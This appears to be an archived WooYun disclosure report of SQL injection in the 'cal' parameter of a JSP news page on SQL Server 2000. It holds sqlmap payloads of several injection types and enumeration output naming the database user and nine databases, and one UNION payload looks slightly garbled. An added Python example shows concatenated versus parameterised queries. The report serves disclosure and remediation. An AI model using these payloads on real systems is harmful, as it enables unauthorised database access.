WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles, online browsing--------http://drop.zone.ci/
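2016-01-13: Details reported to the vendor; awaiting vendor handling
2016-01-14: Vendor confirmed; details disclosed to the vendor only
2016-01-24: Details disclosed to core white hats and relevant domain experts
2016-02-03: Details disclosed to regular white hats
2016-02-13: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public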
Injection point:
http://**.**.**.**/cn/index.jsp?m=newslist&cal=2
The cal parameter is injectable.
Place: GET
Parameter: cal
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=newslist&cal=2' AND 6383=6383 AND 'rAgT'='rAgT

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: m=newslist&cal=2' AND 9916=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(10)+CHAR(120)+CHAR(58)+(SELECT (CASE WHEN (9916=9916) THEN CHAR(49) ELSE CHAR(48)END))+CHAR(58)+CHAR(99)+CHAR(114)+CHAR(120)+CHAR(58))) AND 'qKTa'='qKTa

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: m=newslist&cal=-1503' UNION SELECT CHAR(58)+CHAR(118)+CHAR(107)+CHR(120)+CHAR(58)+CHAR(72)+CHAR(81)+CHAR(108)+CHAR(66)+CHAR(78)+CHAR(68)+CHAR(102+CHAR(89)+CHAR(73)+CHAR(122)+CHAR(58)+CHAR(99)+CHAR(114)+CHAR(120)+CHAR(58)--ND 'rKGe'='rKGe

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: m=newslist&cal=2'; WAITFOR DELAY '0:0:5';-- AND 'xCuf'='xCuf

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: m=newslist&cal=2' WAITFOR DELAY '0:0:5'-- AND 'oZHS'='oZHS
---
[14:17:28] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[14:17:28] [INFO] fetching current user
current user: 'edomuser'
available databases [9]:
[*] agent
[*] edom
[*] ePortal_HR
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
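The payloads above show the cal value being placed inside a quoted SQL literal. The following is an added example, not code from the report or from the affected application: it contrasts that concatenation pattern with an allow-list check plus a bound parameter. It assumes a hypothetical `news` table, uses SQLite as a stand-in for the SQL Server back end, and all function names are made up for illustration.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the news table (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, cal TEXT, title TEXT)")
    db.executemany(
        "INSERT INTO news (cal, title) VALUES (?, ?)",
        [("1", "Company news"), ("2", "Product news"), ("2", "Release notes")],
    )
    return db

def newslist_vulnerable(db, cal):
    # Assumed flaw: the request value is concatenated inside a quoted literal,
    # so a quote in cal ends the literal and the rest is parsed as SQL.
    sql = "SELECT title FROM news WHERE cal = '" + cal + "' ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def newslist_bound(db, cal):
    # Bound parameter: the value is sent as data and never parsed as SQL.
    sql = "SELECT title FROM news WHERE cal = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (cal,))]

def newslist_hardened(db, cal):
    # Allow-list first: cal is a short numeric id, so reject everything else.
    if not (cal.isascii() and cal.isdigit() and len(cal) <= 9):
        raise ValueError("cal must be a numeric category id")
    return newslist_bound(db, cal)

# Boolean-based blind value for cal, copied from the sqlmap output above.
PAGE_PAYLOAD = "2' AND 6383=6383 AND 'rAgT'='rAgT"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", newslist_vulnerable(db, PAGE_PAYLOAD))
    print("bound     :", newslist_bound(db, PAGE_PAYLOAD))
    try:
        newslist_hardened(db, PAGE_PAYLOAD)
    except ValueError as exc:
        print("hardened  : rejected,", exc)
```

With concatenation the payload returns the same rows as cal=2, which is the signal the boolean-based test relies on; with a bound parameter it matches nothing, and the allow-list rejects it before any query runs.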
Severity: High
Vulnerability Rank: 16
Confirmation time: 2016-01-14 03:32
Thank you for the report.
None yet